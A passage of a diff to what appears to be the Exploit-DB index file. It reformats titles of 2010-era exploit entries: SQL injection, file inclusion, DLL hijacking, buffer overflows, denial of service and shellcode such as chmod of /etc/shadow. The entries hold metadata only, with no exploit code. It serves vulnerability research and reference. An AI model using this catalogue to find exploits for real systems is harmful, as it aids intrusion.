bytes)",2010-06-29,gunslinger_,lin_x86,shellcode,0 14274,platforms/php/webapps/14274.txt,"Joomla Music Manager Component LFI",2010-07-08,Sid3^effects,php,webapps,0 14142,platforms/arm/shellcode/14142.c,"Linux/ARM - polymorphic chmod(_/etc/shadow__ 0777) shellcode (84 bytes)",2010-06-30,"Florian Gaultier",arm,shellcode,0 -14121,platforms/multiple/dos/14121.c,"Adobe Reader 9.3.2 (CoolType.dll) Remote Memory Corruption / DoS",2010-06-29,LiquidWorm,multiple,dos,0 +14121,platforms/multiple/dos/14121.c,"Adobe Reader 9.3.2 - (CoolType.dll) Remote Memory Corruption / DoS",2010-06-29,LiquidWorm,multiple,dos,0 14122,platforms/arm/shellcode/14122.txt,"Linux/ARM - chmod(_/etc/shadow__ 0777) Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",arm,shellcode,0 14123,platforms/php/webapps/14123.txt,"WebDM CMS SQL Injection",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 14124,platforms/php/webapps/14124.pl,"PHP-Nuke <= 8.0 - Remote SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 14125,platforms/php/webapps/14125.pl,"ShopCartDx <= 4.30 - (products.php) Blind SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 14126,platforms/php/webapps/14126.txt,"joomla component gamesbox com_gamesbox 1.0.2 - (id) SQL Injection",2010-06-30,v3n0m,php,webapps,0 14127,platforms/php/webapps/14127.txt,"Joomla Joomanager SQL Injection",2010-06-30,Sid3^effects,php,webapps,0 -14141,platforms/php/webapps/14141.pl,"Oxygen2PHP <= 1.1.3 (member.php) SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 +14141,platforms/php/webapps/14141.pl,"Oxygen2PHP <= 1.1.3 - (member.php) SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 14132,platforms/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",php,webapps,0 14139,platforms/arm/shellcode/14139.c,"Linux/ARM - Disable ASLR Security shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",arm,shellcode,0 14144,platforms/php/webapps/14144.txt,"Specialist Bed and Breakfast Website SQL Injection",2010-06-30,JaMbA,php,webapps,0 @@ -12443,8 +12443,8 @@ id,file,description,date,author,platform,type,port 14147,platforms/php/webapps/14147.txt,"NinkoBB CSRF",2010-07-01,"ADEO Security",php,webapps,0 14149,platforms/asp/webapps/14149.txt,"Setiran CMS Blind SQL Injection",2010-07-01,"Th3 RDX",asp,webapps,0 14150,platforms/windows/local/14150.pl,"RM Downloader 3.1.3 - Local SEH Exploit (Windows 7 ASLR and DEP Bypass)",2010-07-01,Node,windows,local,0 -14151,platforms/php/webapps/14151.pl,"Oxygen2PHP <= 1.1.3 (post.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0 -14152,platforms/php/webapps/14152.pl,"Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0 +14151,platforms/php/webapps/14151.pl,"Oxygen2PHP <= 1.1.3 - (post.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0 +14152,platforms/php/webapps/14152.pl,"Oxygen2PHP <= 1.1.3 - (forumdisplay.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0 14153,platforms/windows/local/14153.pl,"Mediacoder 0.7.3.4682 - Universal Buffer Overflow (SEH)",2010-07-01,Madjix,windows,local,0 14154,platforms/php/webapps/14154.txt,"Joomla Component com_dateconverter 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0 14155,platforms/asp/webapps/14155.txt,"SIDA University System SQL Injection",2010-07-01,K053,asp,webapps,0 @@ -12549,7 +12549,7 @@ id,file,description,date,author,platform,type,port 14270,platforms/php/webapps/14270.txt,"Zylone IT Multiple Blind SQL Injection",2010-07-08,Callo,php,webapps,0 14271,platforms/php/webapps/14271.txt,"pithcms (theme) Local Remote File inclusion",2010-07-08,eidelweiss,php,webapps,0 14272,platforms/osx/remote/14272.py,"UFO: Alien Invasion 2.2.1 - IRC Client Remote Code Execution - OS X Snow Leopard (ROP)",2010-07-08,d1dn0t,osx,remote,0 -14275,platforms/windows/remote/14275.txt,"Real Player 12.0.0.879 (0Day)",2010-07-08,webDEViL,windows,remote,0 +14275,platforms/windows/remote/14275.txt,"Real Player 12.0.0.879 - (0Day)",2010-07-08,webDEViL,windows,remote,0 14276,platforms/linux/shellcode/14276.c,"Linux - Find all writeable folder in filesystem polymorphic shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0 14277,platforms/php/webapps/14277.txt,"Inout Music 1.0 - Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 14278,platforms/php/webapps/14278.txt,"Inout Article Base Ultimate Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 @@ -12569,10 +12569,10 @@ id,file,description,date,author,platform,type,port 14434,platforms/php/webapps/14434.txt,"Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0 14312,platforms/php/webapps/14312.txt,"Joomla redSHOP Component 1.0 (com_redshop pid) - SQL Injection",2010-07-10,v3n0m,php,webapps,0 14296,platforms/php/webapps/14296.txt,"Joomla QuickFAQ Component (com_quickfaq) Blind SQL Injection",2010-07-09,RoAd_KiLlEr,php,webapps,0 -14316,platforms/php/webapps/14316.pl,"PHP-Nuke <= 8.0 (Web_Links Module) Remote Blind SQL Injection Exploit",2010-07-10,yawn,php,webapps,0 +14316,platforms/php/webapps/14316.pl,"PHP-Nuke <= 8.0 - (Web_Links Module) Remote Blind SQL Injection Exploit",2010-07-10,yawn,php,webapps,0 14299,platforms/php/webapps/14299.txt,"CMS Contentia (news.php) SQL Injection",2010-07-09,GlaDiaT0R,php,webapps,0 14305,platforms/lin_x86-64/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode,0 -14306,platforms/php/webapps/14306.txt,"HoloCMS 9.0.47 (news.php) SQL Injection",2010-07-09,GlaDiaT0R,php,webapps,0 +14306,platforms/php/webapps/14306.txt,"HoloCMS 9.0.47 - (news.php) SQL Injection",2010-07-09,GlaDiaT0R,php,webapps,0 14309,platforms/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 - ActiveX Buffer Overflow",2010-07-09,blake,windows,remote,0 14308,platforms/php/webapps/14308.txt,"WordPress Firestats - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0 15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS",2010-10-23,d0lc3,windows,dos,0 @@ -12598,7 +12598,7 @@ id,file,description,date,author,platform,type,port 14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (2)",2010-07-12,anonymous,linux,local,0 14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass",2010-07-13,"David K",windows,webapps,0 -14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 (wpd) Buffer Overflow PoC",2010-07-12,LiquidWorm,windows,dos,0 +14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 - (wpd) Buffer Overflow PoC",2010-07-12,LiquidWorm,windows,dos,0 14346,platforms/windows/dos/14346.txt,"Corel Presentations X5 15.0.0.357 - (shw) Buffer Preoccupation PoC",2010-07-12,LiquidWorm,windows,dos,0 14350,platforms/php/webapps/14350.txt,"Joomla Component QContacts (com_qcontacts) - SQL Injection",2010-07-13,_mlk_,php,webapps,0 14349,platforms/windows/dos/14349.html,"Opera - Denial of Service by canvas Element",2010-07-12,"Pouya Daneshmand",windows,dos,0 @@ -12689,7 +12689,7 @@ id,file,description,date,author,platform,type,port 14450,platforms/php/webapps/14450.txt,"Joomla Component (com_iproperty) SQL Injection",2010-07-23,Amine_92,php,webapps,0 14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - LIST Command Remote BoF Exploit (Post Auth) (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 14452,platforms/linux/dos/14452.txt,"ftp Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0 -14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0 +14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0 14454,platforms/php/webapps/14454.txt,"ValidForm Builder script Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0 14455,platforms/php/webapps/14455.txt,"vBulletin(R) 3.8.6 faq.php Information Disclosure",2010-07-24,H-SK33PY,php,webapps,0 14456,platforms/aix/remote/14456.c,"IBM AIX 5l FTPd Remote DES Hash Exploit",2010-07-24,kingcope,aix,remote,0 @@ -12820,7 +12820,7 @@ id,file,description,date,author,platform,type,port 14629,platforms/multiple/webapps/14629.html,"Kleeja Upload - CSRF Change Admin Password",2010-08-12,"KOLTN S",multiple,webapps,80 14630,platforms/windows/local/14630.py,"Mediacoder 0.7.5.4710 - 'Universal' SEH Buffer Overflow Exploit",2010-08-12,Dr_IDE,windows,local,0 14633,platforms/windows/local/14633.py,"Xion Player 1.0.125 - Stack Buffer Overflow Exploit",2010-08-13,corelanc0d3r,windows,local,0 -14634,platforms/windows/dos/14634.txt,"SmartCode ServerX VNC Server ActiveX 1.1.5.0 (scvncsrvx.dll) DoS Exploit",2010-08-13,LiquidWorm,windows,dos,0 +14634,platforms/windows/dos/14634.txt,"SmartCode ServerX VNC Server ActiveX 1.1.5.0 - (scvncsrvx.dll) DoS Exploit",2010-08-13,LiquidWorm,windows,dos,0 14676,platforms/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 - (.m3u) Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local,0 14658,platforms/windows/remote/14658.txt,"123 flashchat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,windows,remote,0 14636,platforms/php/webapps/14636.txt,"Plogger Remote File Disclosure",2010-08-13,Mr.tro0oqy,php,webapps,0 @@ -12891,7 +12891,7 @@ id,file,description,date,author,platform,type,port 14727,platforms/hardware/local/14727.py,"Foxit Reader <= 4.0 pdf Jailbreak Exploit",2010-08-24,"Jose Miguel Esparza",hardware,local,0 14726,platforms/windows/local/14726.c,"uTorrent <= 2.0.3 DLL Hijacking Exploit (plugin_dll.dll)",2010-08-24,TheLeader,windows,local,0 14728,platforms/windows/local/14728.c,"Windows Live Email DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Nicolas Krassas",windows,local,0 -14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 (article.php) SQL Injection",2010-08-28,[]0iZy5,php,webapps,0 +14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 - (article.php) SQL Injection",2010-08-28,[]0iZy5,php,webapps,0 14730,platforms/windows/local/14730.c,"Firefox <= 3.6.8 DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0 14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking Exploit (hhctrl.ocx)",2010-08-24,TheLeader,windows,local,0 14732,platforms/windows/local/14732.c,"Opera 10.61 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Nicolas Krassas",windows,local,0 @@ -12919,7 +12919,7 @@ id,file,description,date,author,platform,type,port 14762,platforms/windows/local/14762.c,"Ettercap NG-0.7.3 DLL Hijacking Exploit (wpcap.dll)",2010-08-25,anonymous,windows,local,0 14758,platforms/windows/local/14758.c,"Microsoft Group Convertor DLL Hijacking Exploit (imm.dll)",2010-08-25,"Beenu Arora",windows,local,0 14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader < 9.x - Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0 -14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 +14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 - (Build 788) DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 14765,platforms/windows/local/14765.c,"Mediaplayer Classic 1.3.2189.0 - DLL Hijacking Exploit (iacenc.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 14766,platforms/windows/local/14766.c,"Skype <= 4.2.0.169 DLL Hijacking Exploit (wab32.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 14767,platforms/windows/dos/14767.txt,"Flash Movie Player 1.5 - File Magic Denial of Service",2010-08-25,"Matthew Bergin",windows,dos,0 @@ -12966,7 +12966,7 @@ id,file,description,date,author,platform,type,port 14824,platforms/windows/dos/14824.txt,"Leadtools ActiveX Raster Twain 16.5 - (LtocxTwainu.dll) Buffer Overflow",2010-08-28,LiquidWorm,windows,dos,0 14826,platforms/php/webapps/14826.txt,"GaleriaSHQIP 1.0 - SQL Injection",2010-08-28,Valentin,php,webapps,0 14827,platforms/php/webapps/14827.py,"Blogman 0.7.1 - (profile.php) SQL Injection Exploit",2010-08-28,"Ptrace Security",php,webapps,0 -14829,platforms/php/webapps/14829.txt,"CF Image Hosting Script 1.3 (settings.cdb) Information Disclosure",2010-08-28,Dr.$audi,php,webapps,0 +14829,platforms/php/webapps/14829.txt,"CF Image Hosting Script 1.3 - (settings.cdb) Information Disclosure",2010-08-28,Dr.$audi,php,webapps,0 14830,platforms/linux/local/14830.py,"nginx 0.6.38 - Heap Corruption Exploit",2010-08-29,"Aaron Conole",linux,local,0 14831,platforms/windows/local/14831.rb,"SnackAmp 3.1.2 - SMP Buffer Overflow (SEH)",2010-08-29,"James Fitts",windows,local,0 14832,platforms/windows/dos/14832.rb,"SnackAmp 3.1.2 - (.wav) Buffer Overflow (PoC)",2010-08-29,"James Fitts",windows,dos,0 @@ -13005,7 +13005,7 @@ id,file,description,date,author,platform,type,port 14884,platforms/php/webapps/14884.txt,"smbind <= 0.4.7 - SQL Injection",2010-09-03,r00t,php,webapps,0 14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 - ActiveX Remote Exploit (UfPBCtrl.DLL)",2010-11-17,Dr_IDE,windows,remote,0 14887,platforms/php/webapps/14887.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities (1)",2010-09-04,Abysssec,php,webapps,0 -14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 (addcomment.php) Persistent XSS Exploit",2010-09-04,"Ptrace Security",php,webapps,0 +14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 - (addcomment.php) Persistent XSS Exploit",2010-09-04,"Ptrace Security",php,webapps,0 14891,platforms/php/webapps/14891.txt,"PHP Classifieds ADS (sid) Blind SQL Injection",2010-09-04,"BorN To K!LL",php,webapps,0 14892,platforms/windows/dos/14892.py,"VLC Media Player < 1.1.4 - (.xspf) smb:// URI Handling Remote Stack Overflow PoC",2010-09-04,s-dz,windows,dos,0 14893,platforms/php/webapps/14893.txt,"php classifieds 7.3 - Remote File Inclusion",2010-09-04,alsa7r,php,webapps,0 @@ -13022,7 +13022,7 @@ id,file,description,date,author,platform,type,port 14908,platforms/asp/webapps/14908.txt,"DMXready Polling Booth Manager SQL Injection",2010-09-05,"L0rd CrusAd3r",asp,webapps,0 14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 SEH Buffer Overflow Crash Proof of Concept",2010-09-05,"Abhishek Lyall",windows,dos,0 14910,platforms/php/webapps/14910.txt,"Softbiz Article Directory Script (sbiz_id) Blind SQL Injection",2010-09-05,"BorN To K!LL",php,webapps,0 -14911,platforms/php/webapps/14911.sh,"Gantry Framework 3.0.10 (Joomla) Blind SQL Injection Exploit",2010-09-05,jdc,php,webapps,0 +14911,platforms/php/webapps/14911.sh,"Gantry Framework 3.0.10 - (Joomla) Blind SQL Injection Exploit",2010-09-05,jdc,php,webapps,0 14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0 14914,platforms/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14915,platforms/php/webapps/14915.txt,"interphoto gallery - Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps,0 @@ -13045,11 +13045,11 @@ id,file,description,date,author,platform,type,port 14944,platforms/windows/local/14944.py,"Microsoft Office Visio 2002 - .DXF File Stack based Overflow",2010-09-08,Abysssec,windows,local,0 14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0 14949,platforms/windows/dos/14949.py,"Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution",2010-09-09,Abysssec,windows,dos,0 -14952,platforms/php/webapps/14952.txt,"Visitors Google Map Lite 1.0.1 (FREE) module mod_visitorsgooglemap SQL Injection",2010-09-09,"Chip d3 bi0s",php,webapps,0 +14952,platforms/php/webapps/14952.txt,"Visitors Google Map Lite 1.0.1 - (FREE) module mod_visitorsgooglemap SQL Injection",2010-09-09,"Chip d3 bi0s",php,webapps,0 14954,platforms/asp/webapps/14954.txt,"aradblog - Multiple Vulnerabilities",2010-09-09,Abysssec,asp,webapps,0 14966,platforms/windows/local/14966.py,"Excel RTD - Memory Corruption",2010-09-10,Abysssec,windows,local,0 15442,platforms/php/webapps/15442.txt,"Zeeways Adserver - Multiple Vulnerabilities",2010-11-06,Valentin,php,webapps,0 -15443,platforms/php/webapps/15443.txt,"RSform! 1.0.5 (Joomla) Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0 +15443,platforms/php/webapps/15443.txt,"RSform! 1.0.5 - (Joomla) Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0 14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0 14960,platforms/php/webapps/14960.txt,"ES Simple Download 1.0. Local File Inclusion",2010-09-09,Kazza,php,webapps,0 14961,platforms/win_x86/local/14961.py,"Audiotran 1.4.2.4 SEH Overflow Exploit",2010-09-09,"Abhishek Lyall",win_x86,local,0 @@ -13064,11 +13064,11 @@ id,file,description,date,author,platform,type,port 14974,platforms/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 - Multiple Modules NULL Pointer Dereference DoS",2010-09-11,d0lc3,windows,dos,0 14976,platforms/linux/remote/14976.txt,"YOPS Web Server Remote Command Execution",2010-09-11,"Rodrigo Escobar",linux,remote,0 14977,platforms/php/webapps/14977.txt,"MyHobbySite 1.01 SQL Injection and Authentication Bypass",2010-09-12,"YuGj VN",php,webapps,0 -14979,platforms/php/webapps/14979.txt,"AlstraSoft AskMe Pro 2.1 (forum_answer.php?que_id) SQL Injection",2010-09-12,Amine_92,php,webapps,0 +14979,platforms/php/webapps/14979.txt,"AlstraSoft AskMe Pro 2.1 - (forum_answer.php?que_id) SQL Injection",2010-09-12,Amine_92,php,webapps,0 14980,platforms/asp/webapps/14980.txt,"eshtery CMS - SQL Injection",2010-09-12,Abysssec,asp,webapps,0 14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,windows,local,0 14985,platforms/php/webapps/14985.txt,"System Shop (Module aktka) SQL Injection",2010-09-12,secret,php,webapps,0 -14986,platforms/php/webapps/14986.txt,"AlstraSoft AskMe Pro 2.1 (profile.php?id) SQL Injection",2010-09-12,CoBRa_21,php,webapps,0 +14986,platforms/php/webapps/14986.txt,"AlstraSoft AskMe Pro 2.1 - (profile.php?id) SQL Injection",2010-09-12,CoBRa_21,php,webapps,0 14987,platforms/windows/dos/14987.py,"Kingsoft Antivirus <= 2010.04.26.648 - Kernel Buffer Overflow Exploit",2010-09-13,"Lufeng Li",windows,dos,0 14988,platforms/php/webapps/14988.txt,"Group Office 3.5.9 - SQL Injection",2010-09-13,ViciOuS,php,webapps,0 14989,platforms/php/webapps/14989.txt,"osDate (uploadvideos.php) Shell Upload",2010-09-13,Xa7m3d,php,webapps,0 @@ -13130,7 +13130,7 @@ id,file,description,date,author,platform,type,port 15067,platforms/asp/webapps/15067.txt,"Personal.Net Portal - Multiple Vulnerabilities",2010-09-21,Abysssec,asp,webapps,0 15069,platforms/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) - Heap Overflow (.mp3.wav.ogg.wma) PoC",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local,0 15070,platforms/php/webapps/15070.txt,"ibPhotohost 1.1.2 - SQL Injection",2010-09-21,fred777,php,webapps,0 -15071,platforms/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 (SoftekATL.dll) Buffer Overflow PoC",2010-09-21,LiquidWorm,windows,remote,0 +15071,platforms/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - (SoftekATL.dll) Buffer Overflow PoC",2010-09-21,LiquidWorm,windows,remote,0 15072,platforms/windows/remote/15072.rb,"Novell iPrint Client ActiveX Control call-back-url Buffer Overflow Exploit (Metasploit)",2010-09-21,Trancer,windows,remote,0 15073,platforms/windows/remote/15073.rb,"Novell iPrint Client ActiveX Control 'debug' Buffer Overflow Exploit",2010-09-21,Trancer,windows,remote,0 15074,platforms/linux/local/15074.sh,"mountall <= 2.15.2 (Ubuntu 10.04/10.10) - Local Privilege Escalation",2010-09-21,fuzz,linux,local,0 @@ -13203,7 +13203,7 @@ id,file,description,date,author,platform,type,port 15174,platforms/php/webapps/15174.txt,"tiki wiki CMS groupware 5.2 - Multiple Vulnerabilities",2010-10-01,"John Leitch",php,webapps,0 15173,platforms/php/webapps/15173.txt,"phpMyShopping 1.0.1505 - Multiple Vulnerabilities",2010-10-01,Metropolis,php,webapps,0 15171,platforms/php/webapps/15171.txt,"jCart 1.1 - Multiple XSS/CSRF/Open Redirect Vulnerabilities",2010-10-01,p0deje,php,webapps,0 -15175,platforms/php/webapps/15175.txt,"Chipmunk Board 1.3 (index.php?forumID) SQL Injection",2010-10-01,Shamus,php,webapps,0 +15175,platforms/php/webapps/15175.txt,"Chipmunk Board 1.3 - (index.php?forumID) SQL Injection",2010-10-01,Shamus,php,webapps,0 15199,platforms/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure Exploit (Python)",2010-10-04,ZoRLu,asp,webapps,0 15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure Exploit",2010-10-02,ZoRLu,asp,webapps,0 15177,platforms/php/webapps/15177.pl,"iGaming CMS <= 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0 @@ -13211,7 +13211,7 @@ id,file,description,date,author,platform,type,port 15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Stored Cross-Site Scripting",2010-10-02,sqlhacker,asp,webapps,0 15186,platforms/ios/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal",2010-10-02,m0ebiusc0de,ios,remote,0 15188,platforms/ios/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit",2010-10-02,m0ebiusc0de,ios,dos,0 -15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x (7.2.3925) LDAP Injection",2010-10-02,sqlhacker,asp,webapps,0 +15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x - (7.2.3925) LDAP Injection",2010-10-02,sqlhacker,asp,webapps,0 15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret (SQL/XSS) Multiple Vulnerabilities",2010-10-02,KnocKout,asp,webapps,0 15194,platforms/php/webapps/15194.txt,"TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload",2010-10-03,Hackeri-AL,php,webapps,0 15200,platforms/php/webapps/15200.txt,"FAQMasterFlex 1.2 - SQL Injection",2010-10-04,cyb3r.anbu,php,webapps,0 @@ -13241,7 +13241,7 @@ id,file,description,date,author,platform,type,port 15225,platforms/php/webapps/15225.txt,"videodb <= 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0 15268,platforms/php/webapps/15268.txt,"WikiWebHelp <= 0.3.3 Insecure Cookie Handling",2010-10-17,FuRty,php,webapps,0 39571,platforms/php/webapps/39571.txt,"Zenphoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80 -15269,platforms/php/webapps/15269.txt,"Tastydir <= 1.2 (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0 +15269,platforms/php/webapps/15269.txt,"Tastydir <= 1.2 - (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0 15227,platforms/php/webapps/15227.txt,"PHP-Fusion MG User-Fotoalbum SQL Injection",2010-10-10,"Easy Laster",php,webapps,0 15592,platforms/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Edit E-mail Cross-Site Request Forgery Exploit",2010-11-21,"Mon7rF .",php,webapps,0 @@ -13328,7 +13328,7 @@ id,file,description,date,author,platform,type,port 15316,platforms/arm/shellcode/15316.asm,"ARM - Loader Port 0x1337 shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 and Assign Address 192.168.0.2 shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0 -15319,platforms/windows/dos/15319.pl,"Apache 2.2 (Windows) Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0 +15319,platforms/windows/dos/15319.pl,"Apache 2.2 - (Windows) Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0 15320,platforms/php/webapps/15320.py,"Bigace_2.7.3 - CSRF Change Admin Password PoC",2010-10-26,Sweet,php,webapps,0 15321,platforms/php/webapps/15321.txt,"DBHcms 1.1.4 (dbhcms_user and searchString) - SQL Injection",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15322,platforms/php/webapps/15322.txt,"phpLiterAdmin 1.0 RC1 - Authentication Bypass",2010-10-27,"High-Tech Bridge SA",php,webapps,0 @@ -13397,7 +13397,7 @@ id,file,description,date,author,platform,type,port 15398,platforms/asp/webapps/15398.txt,"Digger Solutions Newsletter Open Source SQL Injection",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 15399,platforms/asp/webapps/15399.txt,"Site2Nite Business eListings SQL Injection",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 15400,platforms/php/webapps/15400.txt,"Dolphin 7.0.3 - Multiple Vulnerabilities",2010-11-02,anT!-Tr0J4n,php,webapps,0 -15917,platforms/php/webapps/15917.txt,"Ignition 1.3 (comment.php) Local File Inclusion",2011-01-06,n0n0x,php,webapps,0 +15917,platforms/php/webapps/15917.txt,"Ignition 1.3 - (comment.php) Local File Inclusion",2011-01-06,n0n0x,php,webapps,0 15403,platforms/windows/local/15403.py,"Minishare 1.4.0 < 1.5.5 - Buffer Overflow (users.txt)",2010-11-02,"Chris Gabriel",windows,local,0 15406,platforms/windows/local/15406.rb,"Minishare 1.5.5 - Buffer Overflow (SEH)",2010-11-03,"Muhamad Fadzil Ramli",windows,local,0 15404,platforms/php/webapps/15404.txt,"eLouai's Force Download Script Arbitrary Local File Download",2010-11-03,v1R00Z,php,webapps,0 @@ -13527,7 +13527,7 @@ id,file,description,date,author,platform,type,port 15567,platforms/php/webapps/15567.txt,"WebRCSdiff 0.9 - (viewver.php) Remote File Inclusion",2010-11-18,FL0RiX,php,webapps,0 15568,platforms/php/webapps/15568.py,"chCounter <= 3.1.3 - SQL Injection",2010-11-18,"Matias Fontanini",php,webapps,0 15569,platforms/windows/local/15569.rb,"MP3-Nator - Buffer Overflow (SEH DEP BYPASS)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0 -15570,platforms/php/webapps/15570.php,"Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF",2010-11-18,jdc,php,webapps,0 +15570,platforms/php/webapps/15570.php,"Mosets Tree 2.1.6 - (Joomla) Template Overwrite CSRF",2010-11-18,jdc,php,webapps,0 15571,platforms/php/webapps/15571.txt,"fozzcom shopping<= 7.94+8.04 - Multiple Vulnerabilities",2010-11-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 15572,platforms/php/webapps/15572.txt,"viart shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0 15573,platforms/php/webapps/15573.html,"PHPGallery 1.1.0 - CSRF",2010-11-19,Or4nG.M4N,php,webapps,0 @@ -13568,7 +13568,7 @@ id,file,description,date,author,platform,type,port 15631,platforms/hardware/remote/15631.txt,"HP LaserJet Directory Traversal in PJL Interface",2010-11-29,"n.runs AG",hardware,remote,0 15632,platforms/windows/dos/15632.py,"FoxPlayer 2.4.0 - Denial of Service",2010-11-29,"Oh Yaw Theng",windows,dos,0 15633,platforms/php/webapps/15633.html,"Diferior 8.03 - 